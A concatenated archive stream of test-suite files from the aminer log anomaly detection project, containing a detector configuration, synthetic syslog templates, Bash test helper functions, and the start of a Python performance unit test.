from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler simple_unparsed_atom_handler = SimpleUnparsedAtomHandler(anomaly_event_handlers) atom_filter.add_handler(simple_unparsed_atom_handler, stop_when_handled_flag=True) analysis_context.register_component(simple_unparsed_atom_handler, component_name="UnparsedHandler") from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector timestamps_unsorted_detector = TimestampsUnsortedDetector(analysis_context.aminer_config, anomaly_event_handlers) atom_filter.add_handler(timestamps_unsorted_detector) analysis_context.register_component(timestamps_unsorted_detector, component_name="TimestampsUnsortedDetector") from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector allowlist_rules = [ Rules.OrMatchRule([ Rules.AndMatchRule([ Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes'), Rules.NegationMatchRule(Rules.ValueMatchRule('/model/LoginDetails/Username', b'root'))]), Rules.AndMatchRule([ Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails/PastTime/Time/Minutes')), Rules.PathExistsMatchRule('/model/LoginDetails')]), Rules.NegationMatchRule(Rules.PathExistsMatchRule('/model/LoginDetails'))])] # This rule list should trigger, when the line does not look like: User root (logged in, logged out) # or User 'username' (logged in, logged out) x minutes ago. 
allowlist_violation_detector = AllowlistViolationDetector(analysis_context.aminer_config, allowlist_rules, anomaly_event_handlers) analysis_context.register_component(allowlist_violation_detector, component_name="Allowlist") atom_filter.add_handler(allowlist_violation_detector) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_detector, component_name="NewMatchPath") atom_filter.add_handler(new_match_path_detector) def tuple_transformation_function(match_value_list): """Only allow output of the EnhancedNewMatchPathValueComboDetector after every 10000th element.""" extra_data = enhanced_new_match_path_value_combo_detector.known_values_dict.get(tuple(match_value_list)) if extra_data is not None: mod = 10000 if (extra_data[2] + 1) % mod == 0: enhanced_new_match_path_value_combo_detector.learn_mode = False else: enhanced_new_match_path_value_combo_detector.learn_mode = True return match_value_list from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/DailyCron/UName', '/model/DailyCron/JobNumber'], anomaly_event_handlers, learn_mode=True, tuple_transformation_function=tuple_transformation_function) analysis_context.register_component(enhanced_new_match_path_value_combo_detector, component_name="EnhancedNewValueCombo") atom_filter.add_handler(enhanced_new_match_path_value_combo_detector) from aminer.analysis.HistogramAnalysis import HistogramAnalysis, LinearNumericBinDefinition, ModuloTimeBinDefinition, \ PathDependentHistogramAnalysis modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, True) linear_numeric_bin_definition = LinearNumericBinDefinition(50, 5, 20, True) 
histogram_analysis = HistogramAnalysis(analysis_context.aminer_config, [ ('/model/RandomTime/Random', modulo_time_bin_definition), ('/model/Random', linear_numeric_bin_definition)], 10, anomaly_event_handlers) analysis_context.register_component(histogram_analysis, component_name="HistogramAnalysis") atom_filter.add_handler(histogram_analysis) path_dependent_histogram_analysis = PathDependentHistogramAnalysis(analysis_context.aminer_config, '/model/RandomTime', modulo_time_bin_definition, 10, anomaly_event_handlers) analysis_context.register_component(path_dependent_histogram_analysis, component_name="PathDependentHistogramAnalysis") atom_filter.add_handler(path_dependent_histogram_analysis) from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector match_value_average_change_detector = MatchValueAverageChangeDetector(analysis_context.aminer_config, anomaly_event_handlers, None, ['/model/Random'], 100, 10) analysis_context.register_component(match_value_average_change_detector, component_name="MatchValueAverageChange") atom_filter.add_handler(match_value_average_change_detector) import sys from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter match_value_stream_writer = MatchValueStreamWriter(sys.stdout, [ '/model/Sensors/CPUTemp', '/model/Sensors/CPUWorkload', '/model/Sensors/DTM'], b';', b'') analysis_context.register_component(match_value_stream_writer, component_name="MatchValueStreamWriter") atom_filter.add_handler(match_value_stream_writer) from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ '/model/IPAddresses/Username', '/model/IPAddresses/IP'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_combo_detector, component_name="NewMatchPathValueCombo") atom_filter.add_handler(new_match_path_value_combo_detector) from 
aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector(analysis_context.aminer_config, [ '/model/DailyCron/JobNumber', '/model/IPAddresses/Username'], anomaly_event_handlers, learn_mode=True) analysis_context.register_component(new_match_path_value_detector, component_name="NewMatchPathValue") atom_filter.add_handler(new_match_path_value_detector) from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathValueDetector missing_match_path_value_detector = MissingMatchPathValueDetector( analysis_context.aminer_config, ['/model/DiskReport/Space'], anomaly_event_handlers, learn_mode=True, default_interval=2, realert_interval=5) analysis_context.register_component(missing_match_path_value_detector, component_name="MissingMatch") atom_filter.add_handler(missing_match_path_value_detector) from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector time_correlation_detector = TimeCorrelationDetector( analysis_context.aminer_config, anomaly_event_handlers, 2, min_rule_attributes=1, max_rule_attributes=5, record_count_before_event=70000, output_logline=True) analysis_context.register_component(time_correlation_detector, component_name="TimeCorrelationDetector") atom_filter.add_handler(time_correlation_detector) from aminer.analysis.TimeCorrelationViolationDetector import TimeCorrelationViolationDetector, CorrelationRule, EventClassSelector cron_job_announcement = CorrelationRule( 'CronJobAnnouncement', 5, 6, artefact_match_parameters=[('/model/CronAnnouncement/JobNumber', '/model/CronExecution/JobNumber')]) a_class_selector = EventClassSelector('Announcement', [cron_job_announcement], None) b_class_selector = EventClassSelector('Execution', None, [cron_job_announcement]) rules = [Rules.PathExistsMatchRule('/model/CronAnnouncement/Run', a_class_selector), Rules.PathExistsMatchRule('/model/CronExecution/Job', b_class_selector)] time_correlation_violation_detector = 
TimeCorrelationViolationDetector(analysis_context.aminer_config, rules, anomaly_event_handlers) analysis_context.register_component(time_correlation_violation_detector, component_name="TimeCorrelationViolationDetector") atom_filter.add_handler(time_correlation_violation_detector) syslog_high_performance-template000066400000000000000000000161711500476301700343510ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 
2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 
2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:13 ubuntu user cron[28683]: Job `cron.daily` started. 
56 149 172 165 21 126 53 10 197 159 19 184 111 200 83 121 127 0 69 161 139 76 151 152 77 53 139 166 151 18 128 128 119 79 159 160 101 70 0 134 32 67 152 119 50 121 186 173 104 194 113 158 77 119 152 187 82 91 44 169 117 26 26 32 49 198 35 147 66 49 47 154 48 136 106 5 97 115 109 157 16 187 55 149 183 25 41 49 26 30 155 75 149 105 90 103 93 193 Random: 61646 Random: 81742 Random: 22454 Random: 61172 Random: 59230 Random: 57422 Random: 24186 Random: 13177 Random: 67097 Random: 77130 Random: 37168 Random: 42606 Random: 16250 Random: 16423 Random: 12743 Random: 47250 Random: 62026 Random: 28145 Random: 25117 Random: 11797 Random: 43684 Random: 56609 Random: 62107 Random: 57898 Random: 25565 Random: 40031 Random: 44657 Random: 34302 Random: 36463 Random: 7023 Random: 86129 Random: 41616 Random: 73781 Random: 83829 Random: 31521 Random: 42596 Random: 5687 Random: 58642 Random: 65931 Random: 57658 Random: 15693 Random: 7534 Random: 12311 Random: 56644 Random: 77670 Random: 14175 Random: 59887 Random: 11717 Random: 14783 Random: 15503 Random: 75391 Random: 18644 Random: 13260 Random: 51701 Random: 60789 Random: 13497 Random: 57472 Random: 35255 Random: 35782 Random: 43238 Random: 18718 Random: 44907 Random: 27974 Random: 75586 Random: 60078 Random: 60865 Random: 30213 Random: 19708 Random: 7868 Random: 62418 Random: 49624 Random: 8091 Random: 64423 Random: 53824 Random: 73947 Random: 14804 Random: 13523 Current Disk Data is: Filesystem Type Size Used Avail Use% % Current Disk Data is: Filesystem Type Size Used Avail Use% dd% Current Disk Data is: Filesystem Type Size Used Avail Use% dd% Current Disk Data is: Filesystem Type Size Used Avail Use% dd% User admin changed IP address to 10.0.0.224 User user changed IP address to 10.0.0.41 User guest2 changed IP address to 10.0.0.9 User guest2 changed IP address to 10.0.0.168 User guest2 changed IP address to 10.0.0.156 2019-09-19 16:33:50 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 
2019-09-19 16:33:56 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:02 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:07 ubuntu cron[50001]: Job `cron.daily' started 2019-09-19 16:34:08 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:15 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:16 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:21 ubuntu cron[50000]: Job `cron.daily' started User username logged in User root logged in syslog_low_performance_many_outputs-template000066400000000000000000000202031500476301700370510ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/system/performance-tests2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:55 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:56 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:57 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:58 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 
2019-09-19 16:32:59 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:00 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:01 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:02 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[36190]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:03 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:04 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:05 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:06 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 
2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:07 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:08 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:09 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:10 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:11 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:12 ubuntu user cron[28683]: Job `cron.daily` started. 2019-09-19 16:33:13 ubuntu user cron[28683]: Job `cron.daily` started. 
56 149 172 165 21 126 53 10 197 159 19 184 111 200 83 121 127 0 69 161 139 76 151 152 77 53 139 166 151 18 128 128 119 79 159 160 101 70 0 134 32 67 152 119 50 121 186 173 104 194 113 158 77 119 152 187 82 91 44 169 117 26 26 32 49 198 35 147 66 49 47 154 48 136 106 5 97 115 109 157 16 187 55 149 183 25 41 49 26 30 155 75 149 105 90 103 93 193 Random: 61646 Random: 81742 Random: 22454 Random: 61172 Random: 59230 Random: 57422 Random: 24186 Random: 13177 Random: 67097 Random: 77130 Random: 37168 Random: 42606 Random: 16250 Random: 16423 Random: 12743 Random: 47250 Random: 62026 Random: 28145 Random: 25117 Random: 11797 Random: 43684 Random: 56609 Random: 62107 Random: 57898 Random: 25565 Random: 40031 Random: 44657 Random: 34302 Random: 36463 Random: 7023 Random: 86129 Random: 41616 Random: 73781 Random: 83829 Random: 31521 Random: 42596 Random: 5687 Random: 58642 Random: 65931 Random: 57658 Random: 15693 Random: 7534 Random: 12311 Random: 56644 Random: 77670 Random: 14175 Random: 59887 Random: 11717 Random: 14783 Random: 15503 Random: 75391 Random: 18644 Random: 13260 Random: 51701 Random: 60789 Random: 13497 Random: 57472 Random: 35255 Random: 35782 Random: 43238 Random: 18718 Random: 44907 Random: 27974 Random: 75586 Random: 60078 Random: 60865 Random: 30213 Random: 19708 Random: 7868 Random: 62418 Random: 49624 Random: 8091 Random: 64423 Random: 53824 Random: 73947 Random: 14804 Random: 13523 CPU Temp: 62°C, CPU Workload: 82%, 2019-09-19 16:33:39 CPU Temp: 30°C, CPU Workload: 77%, 2019-09-19 16:33:39 CPU Temp: 42°C, CPU Workload: 62%, 2019-09-19 16:33:39 CPU Temp: 31°C, CPU Workload: 43%, 2019-09-19 16:33:40 CPU Temp: 84°C, CPU Workload: 77%, 2019-09-19 16:33:40 CPU Temp: 43°C, CPU Workload: 34%, 2019-09-19 16:33:40 CPU Temp: 59°C, CPU Workload: 56%, 2019-09-19 16:33:40 CPU Temp: 61°C, CPU Workload: 44%, 2019-09-19 16:33:41 Current Disk Data is: Filesystem Type Size Used Avail Use% % Current Disk Data is: Filesystem Type Size Used Avail Use% dd% Current Disk 
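Data is: Filesystem Type Size Used Avail Use% dd% Current Disk Data is: Filesystem Type Size Used Avail Use% dd% User admin changed IP address to 10.0.0.224 User user changed IP address to 10.0.0.41 User guest2 changed IP address to 10.0.0.9 User guest2 changed IP address to 10.0.0.168 User guest2 changed IP address to 10.0.0.156 2019-09-19 16:33:50 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:33:56 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:02 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:07 ubuntu cron[50001]: Job `cron.daily' started 2019-09-19 16:34:08 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:15 ubuntu cron[50000]: Job `cron.daily' started 2019-09-19 16:34:16 ubuntu cron[50000]: Will run job `cron.daily' in 5 min. 2019-09-19 16:34:21 ubuntu cron[50000]: Job `cron.daily' started User username logged in User root logged in User user logged in 6 minutes ago. User root logged in 6 minutes ago. dafsdff12%3§fasß?–_=yy VXNlcm5hbWU6ICJ1c2VyIgpQYXNzd29yZDogInBhc3N3b3JkIg== Current DateTime: 19.09.2019 16:34:26 -25878952156245.222239655488955 - 3695465546654 This is some part of a csv file; match data: 25000 b654686973206973206a7573742061206e6f726d616c2074657874 Gateway IP-Address: 192.168.128.225 Feb 25 2019 The-searched-element-was-found! drawn number: 38drawn number: 30drawn number: 15drawn number: 5drawn number: 9 --------------------------------------------------------------------- lbtujyvysrcry logdata-anomaly-miner-2.8.0/aecid-testsuite/testFunctions.sh000077500000000000000000000047231500476301700242160ustar00rootroot00000000000000
#!/bin/bash
# Helper functions shared by the aecid-testsuite system tests. They are sourced by the individual
# test scripts; every function reports its outcome through the shell exit status.

# testConfigError <output-file> <message>
# Scans an aminer output file for signs of a configuration error: unparsed atoms
# (VerboseUnparsedAtomHandler), a Python traceback, a dumped parser dictionary ("{'Parser'"),
# FATAL or Config-Error lines. On a hit the message and the whole file are printed.
# Returns 0 when the file looks clean, 1 otherwise (also 1 on a wrong parameter count).
function testConfigError() {
  RET=0
  # "[[ !$# -eq 2 ]]" never fired (it arithmetically negates $#); -ne is the intended arity test.
  if [[ $# -ne 2 ]]; then
    echo
    echo "testConfigError() needs exactly 2 parameters!"
    return 1
  fi
  # grep -c prints nothing for an unreadable file, so a missing output file also counts as an error.
  if [[ $(grep -ic "VerboseUnparsedAtomHandler" "$1") != 0 ]] || grep -Fq "Traceback" "$1" || grep -Fq "{'Parser'" "$1" || grep -Fq "FATAL" "$1" || grep -Fq "Config-Error" "$1"; then
    echo "$2"
    RET=1
    cat "$1"
    echo
    echo
  fi
  return $RET
}

# compareStrings <actual> <expected> <message>
# Prints the actual value, the message and the expected value when the two strings differ.
# Returns 0 when equal, 1 when different or on a wrong parameter count.
function compareStrings() {
  RET=0
  if [[ $# -ne 3 ]]; then
    echo
    echo "compareStrings() needs exactly 3 parameters!"
    return 1
  fi
  if [[ "$1" != "$2" ]]; then
    echo "$1"
    echo
    echo "$3"
    echo
    echo "$2"
    echo
    RET=1
  fi
  return $RET
}

# compareVersionStrings <version-a> <version-b>
# Compares dotted version strings numerically, component by component. A "-suffix" (e.g. a package
# revision) is stripped first and only the common number of components is compared, so "2.8" equals
# "2.8.0". Returns 0 when equal, 1 when a > b, 2 when a < b, 255 on a wrong parameter count.
function compareVersionStrings(){
  if [[ $# -ne 2 ]]; then
    echo "compareVersionStrings() needs exactly 2 parameters!"
    return 255  # the status "return -1" yields on bash >= 4.4; older bash rejects a negative argument
  fi
  IFS='-' read -ra VERSION <<< "$1"
  VERSION="${VERSION[0]}"
  IFS='.' read -ra V1 <<< "$VERSION"
  IFS='-' read -ra VERSION <<< "$2"
  VERSION="${VERSION[0]}"
  IFS='.' read -ra V2 <<< "$VERSION"
  LEN1=${#V1[@]}
  LEN2=${#V2[@]}
  LEN=$(( LEN1 < LEN2 ? LEN1 : LEN2 )) # minimum length
  for ((i=0; i < LEN; i++)); do
    if [[ "${V1[i]}" -lt "${V2[i]}" ]]; then
      return 2
    elif [[ "${V1[i]}" -gt "${V2[i]}" ]]; then
      return 1
    fi
  done
  return 0
}

# runAminerUntilEnd <command> <logfile> <repositioning-file> <config-path> [<output-file>] [<keep-running>]
# Appends a one-second Core.PersistencePeriod to the .py or .yml config (written as the file's owner),
# starts <command> in the background (stdout redirected to <output-file> when given) and polls the
# repositioning file until its second comma-separated field equals the size of <logfile> or 120 s have
# passed. Afterwards the appended config line is removed again.
# With 4 or 5 arguments the aminer is stopped (pkill -x aminer.py) and its exit status is returned;
# with a 6th argument it keeps running and the PID is returned as the status, which only works for
# PIDs below 256 -- callers should read the global PID variable instead.
# Returns 2 when the config path has neither a .py nor a .yml suffix.
# <command> is deliberately expanded unquoted so a caller can pass a whole command line in one string;
# it is test-suite input, not data from the logs under analysis.
function runAminerUntilEnd() {
  CMD=$1
  LOGFILE=$2
  REP_PATH=$3
  CFG_PATH=$4
  local CFG_OWNER
  CFG_OWNER=$(stat -c '%U' "$CFG_PATH")  # kept local so the caller's USER is not clobbered
  if [[ $CFG_PATH == *.py ]]; then
    echo "config_properties['Core.PersistencePeriod'] = 1" | sudo -u "$CFG_OWNER" tee -a "$CFG_PATH" > /dev/null
  elif [[ $CFG_PATH == *.yml ]]; then
    echo "Core.PersistencePeriod: 1" | sudo -u "$CFG_OWNER" tee -a "$CFG_PATH" > /dev/null
  else
    return 2
  fi
  sudo rm "$REP_PATH" 2> /dev/null
  if [ $# -ge 5 ]; then
    OUT=$5
    $CMD > "$OUT" &
  elif [ $# -eq 4 ]; then
    $CMD &
  fi
  PID=$!  # global on purpose: the return status cannot carry a full PID
  FILE_SIZE=$(stat --printf="%s" "$LOGFILE" 2> /dev/null)
  IN=$(cat "$REP_PATH" 2> /dev/null)
  IFS=',' read -ra ADDR <<< "$IN"
  CURRENT_SIZE=$(echo ${ADDR[1]} | sed 's/ *$//g') # trim all whitespaces
  CNTR=0
  while [[ ("$CURRENT_SIZE" != "$FILE_SIZE" || "$CURRENT_SIZE" == "") && $CNTR -lt 120 ]]; do
    sleep 1
    IN=$(cat "$REP_PATH" 2> /dev/null)
    IFS=',' read -ra ADDR <<< "$IN"
    CURRENT_SIZE=$(echo ${ADDR[1]} | sed 's/ *$//g') # trim all whitespaces
    CNTR=$((CNTR + 1))
  done
  sleep 3
  sudo sed -i '$d' "$CFG_PATH" # delete PersistencePeriod config in file.
  if [ $# -lt 6 ]; then
    sudo pkill -x aminer.py
    wait $PID
    RES=$?
    return $RES
  fi
  return $PID
}
 logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/000077500000000000000000000000001500476301700217605ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/AnalysisComponentsPerformanceTest.py000066400000000000000000002471341500476301700312200ustar00rootroot00000000000000
import unittest
from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector
from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector
from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter
from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathListValueDetector
from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector
from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector
from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector
from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector
from aminer.analysis import Rules
from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector
from aminer.analysis.AtomFilters import MatchPathFilter, SubhandlerFilter, MatchValueFilter
from aminer.analysis.EventTypeDetector import EventTypeDetector
from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector
from aminer.analysis.EventSequenceDetector import 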
